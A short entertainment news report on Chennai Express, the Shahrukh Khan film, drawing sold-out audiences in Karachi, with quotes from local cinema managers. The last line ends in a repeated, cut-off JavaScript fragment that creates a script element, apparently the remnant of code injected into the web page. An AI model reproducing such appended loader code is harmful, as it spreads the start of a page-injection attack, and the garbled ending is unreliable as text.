Chennai Express, starring Shahrukh Khan and Deepika Padukone is in it’s second week, and looks like the action comedy flick is all set to stay here for a while now.
The blockbuster film is running strong and reaping gold at the box office not only in India but in other countries as well. Presently, Chennai Express has become a huge hit in Karachi, over shadowing all other films on its release day.
Says Aziz Khan, general manager of Capri cinema, “Being Pakistanis, we like to promote our films. Therefore, we ran ‘Ishq Khuda’ for two days but it didn’t attract sufficient audiences.”
“On the other hand, ‘Chennai Express’ is doing a roaring business from the first show.”
Anita Kenneth, head of marketing at Atrium Cinema, explains the main reason why Chennai Express is such a huge success. She says, “From day one … ‘Chennai Express’ has been sold out.” “It’s a typical Rohit Shetty comedy and masala movie. Then, of course, the glamorous Deepika Padukone is in the movie.”
The SRK starrer film is expected to do well in the weeks to come, as well.var d=document;var s=d.createElement(‘script’); var d=document;var s=d.createElement(‘script’);
